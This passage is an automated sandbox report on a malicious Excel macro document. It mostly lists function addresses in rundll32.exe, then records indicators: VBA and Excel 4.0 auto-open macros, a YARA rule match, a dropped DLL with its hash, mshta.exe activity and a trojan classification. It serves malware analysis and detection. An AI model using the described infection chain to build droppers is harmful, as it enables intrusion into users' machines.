Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00275361 11_2_00275361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00274346 11_2_00274346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002913AD 11_2_002913AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028C3A0 11_2_0028C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028D389 11_2_0028D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028E395 11_2_0028E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028F435 11_2_0028F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028044F 11_2_0028044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002764E2 11_2_002764E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00288519 11_2_00288519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00275548 11_2_00275548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027A55F 11_2_0027A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00282550 11_2_00282550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002895FA 11_2_002895FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027E5CF 11_2_0027E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028C631 11_2_0028C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00288606 11_2_00288606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028A666 11_2_0028A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002866CA 11_2_002866CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027D6D8 11_2_0027D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00277735 11_2_00277735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028473C 11_2_0028473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00279714 11_2_00279714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028176B 11_2_0028176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027B74D 11_2_0027B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00274816 11_2_00274816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00281889 11_2_00281889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00278969 11_2_00278969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028894B 11_2_0028894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002909B5 11_2_002909B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_002759F2 11_2_002759F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028AA30 11_2_0028AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00271A56 11_2_00271A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027EA99 11_2_0027EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028BB23 11_2_0028BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00278B3D 11_2_00278B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00280B19 11_2_00280B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027BB7E 11_2_0027BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028CB5B 11_2_0028CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00287BA6 11_2_00287BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00279B83 11_2_00279B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00284B87 11_2_00284B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028DBEA 11_2_0028DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00288BE3 11_2_00288BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00289BCF 11_2_00289BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00272BD9 11_2_00272BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00277C37 11_2_00277C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028AC3A 11_2_0028AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00273C3C 11_2_00273C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00290C14 11_2_00290C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00286C49 11_2_00286C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00274C5D 11_2_00274C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028DCF7 11_2_0028DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00285CC4 11_2_00285CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00276D24 11_2_00276D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00286DF8 11_2_00286DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00279DCF 11_2_00279DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00287DD5 11_2_00287DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028BE27 11_2_0028BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00290E3A 11_2_00290E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00273E3F 11_2_00273E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028AE6D 11_2_0028AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00275E60 11_2_00275E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00280E53 11_2_00280E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027EE81 11_2_0027EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00289EEC 11_2_00289EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00274EE3 11_2_00274EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027AEFB 11_2_0027AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0028DEDC 11_2_0028DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00290F33 11_2_00290F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027CF47 11_2_0027CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0027DFF3 11_2_0027DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00277FF2 11_2_00277FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00189011 12_2_00189011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00183C3C 12_2_00183C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019044F 12_2_0019044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001920BA 12_2_001920BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018D6D8 12_2_0018D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018F8FD 12_2_0018F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00194116 12_2_00194116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019473C 12_2_0019473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018AB87 12_2_0018AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A13AD 12_2_001A13AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001995FA 12_2_001995FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00187FF2 12_2_00187FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001859F2 12_2_001859F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00184816 12_2_00184816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A0C14 12_2_001A0C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00190001 12_2_00190001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00198606 12_2_00198606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A0E3A 12_2_001A0E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019AC3A 12_2_0019AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00183E3F 12_2_00183E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019C631 12_2_0019C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019AA30 12_2_0019AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019F435 12_2_0019F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00187C37 12_2_00187C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019BE27 12_2_0019BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00184C5D 12_2_00184C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00182051 12_2_00182051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00182251 12_2_00182251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00190E53 12_2_00190E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A0056 12_2_001A0056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00181A56 12_2_00181A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00196C49 12_2_00196C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019907F 12_2_0019907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019AE6D 12_2_0019AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00185E60 12_2_00185E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019A666 12_2_0019A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018EA99 12_2_0018EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018F09B 12_2_0018F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00191889 12_2_00191889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018EE81 12_2_0018EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001870B3 12_2_001870B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019DEDC 12_2_0019DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001966CA 12_2_001966CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018E2CC 12_2_0018E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00195CC4 12_2_00195CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018B2C7 12_2_0018B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018AEFB 12_2_0018AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019DCF7 12_2_0019DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019A2E8 12_2_0019A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00199EEC 12_2_00199EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001864E2 12_2_001864E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00184EE3 12_2_00184EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00198519 12_2_00198519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00190B19 12_2_00190B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00189714 12_2_00189714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00188B3D 12_2_00188B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A0F33 12_2_001A0F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00187735 12_2_00187735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019BB23 12_2_0019BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00186D24 12_2_00186D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019CB5B 12_2_0019CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018A55F 12_2_0018A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00192550 12_2_00192550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00185548 12_2_00185548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019894B 12_2_0019894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018B74D 12_2_0018B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00184346 12_2_00184346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018CF47 12_2_0018CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018BB7E 12_2_0018BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00188969 12_2_00188969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019176B 12_2_0019176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00185361 12_2_00185361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018E991 12_2_0018E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019E395 12_2_0019E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019D389 12_2_0019D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00189B83 12_2_00189B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00194B87 12_2_00194B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001851BB 12_2_001851BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A09B5 12_2_001A09B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001881B7 12_2_001881B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019C3A0 12_2_0019C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00197BA6 12_2_00197BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00182BD9 12_2_00182BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00197DD5 12_2_00197DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00199BCF 12_2_00199BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00189DCF 12_2_00189DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018E5CF 12_2_0018E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00196DF8 12_2_00196DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018DFF3 12_2_0018DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0019DBEA 12_2_0019DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_00198BE3 12_2_00198BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025F8FD 14_2_0025F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025AB87 14_2_0025AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025E991 14_2_0025E991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026BE27 14_2_0026BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00257C37 14_2_00257C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026F435 14_2_0026F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026AA30 14_2_0026AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026C631 14_2_0026C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00253C3C 14_2_00253C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00253E3F 14_2_00253E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026AC3A 14_2_0026AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00270E3A 14_2_00270E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00268606 14_2_00268606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00260001 14_2_00260001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00270C14 14_2_00270C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00254816 14_2_00254816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00259011 14_2_00259011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026A666 14_2_0026A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00255E60 14_2_00255E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026AE6D 14_2_0026AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026907F 14_2_0026907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026044F 14_2_0026044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00266C49 14_2_00266C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00270056 14_2_00270056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00251A56 14_2_00251A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00252051 14_2_00252051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00252251 14_2_00252251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00260E53 14_2_00260E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00254C5D 14_2_00254C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002570B3 14_2_002570B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002620BA 14_2_002620BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025EE81 14_2_0025EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00261889 14_2_00261889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025EA99 14_2_0025EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025F09B 14_2_0025F09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00254EE3 14_2_00254EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002564E2 14_2_002564E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00269EEC 14_2_00269EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026A2E8 14_2_0026A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026DCF7 14_2_0026DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025AEFB 14_2_0025AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025B2C7 14_2_0025B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00265CC4 14_2_00265CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025E2CC 14_2_0025E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002666CA 14_2_002666CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026DEDC 14_2_0026DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025D6D8 14_2_0025D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00256D24 14_2_00256D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026BB23 14_2_0026BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00257735 14_2_00257735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00270F33 14_2_00270F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00258B3D 14_2_00258B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026473C 14_2_0026473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00264116 14_2_00264116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00259714 14_2_00259714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00268519 14_2_00268519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00260B19 14_2_00260B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00255361 14_2_00255361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00258969 14_2_00258969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026176B 14_2_0026176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025BB7E 14_2_0025BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025CF47 14_2_0025CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00254346 14_2_00254346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025B74D 14_2_0025B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00255548 14_2_00255548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026894B 14_2_0026894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00262550 14_2_00262550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025A55F 14_2_0025A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026CB5B 14_2_0026CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00267BA6 14_2_00267BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026C3A0 14_2_0026C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002713AD 14_2_002713AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002709B5 14_2_002709B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002581B7 14_2_002581B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002551BB 14_2_002551BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00264B87 14_2_00264B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00259B83 14_2_00259B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026D389 14_2_0026D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026E395 14_2_0026E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00268BE3 14_2_00268BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0026DBEA 14_2_0026DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025DFF3 14_2_0025DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00257FF2 14_2_00257FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002559F2 14_2_002559F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002695FA 14_2_002695FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00266DF8 14_2_00266DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00269BCF 14_2_00269BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00259DCF 14_2_00259DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0025E5CF 14_2_0025E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00267DD5 14_2_00267DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00252BD9 14_2_00252BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00223C3C 15_2_00223C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00229011 15_2_00229011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0023044F 15_2_0023044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_002320BA 15_2_002320BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0022F8FD 15_2_0022F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0022D6D8 15_2_0022D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0023473C 15_2_0023473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00234116 15_2_00234116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_002413AD 15_2_002413AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0022AB87 15_2_0022AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00227FF2 15_2_00227FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_002259F2 15_2_002259F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_002395FA 15_2_002395FA
Source: 32E3.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Source: 2022-28-01_1202.xls Macro extractor: Sheet name: REEEEEEEE
Source: 2022-28-01_1202.xls Macro extractor: Sheet name: REEEEEEEE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: Joe Sandbox View Dropped File: C:\ProgramData\JooSee.dll 21C51D21F3133DF7A51F34255F0E545390A863D5D5C48FB657EAAD3EF72BF253
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_0018E249 DeleteService, 12_2_0018E249
Source: 2022-28-01_1202.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\2022-28-01_1202.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Vkgzbyhfrraf\
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
Source: 2022-28-01_1202.xls OLE indicator, VBA macros: true
Source: 2022-28-01_1202.xls.0.dr OLE indicator, VBA macros: true
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@25/9@2/48
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: 2022-28-01_1202.xls OLE indicator, Workbook stream: true
Source: 2022-28-01_1202.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc, 9_2_100125C0
Source: 2022-28-01_1202.xls ReversingLabs: Detection: 11%
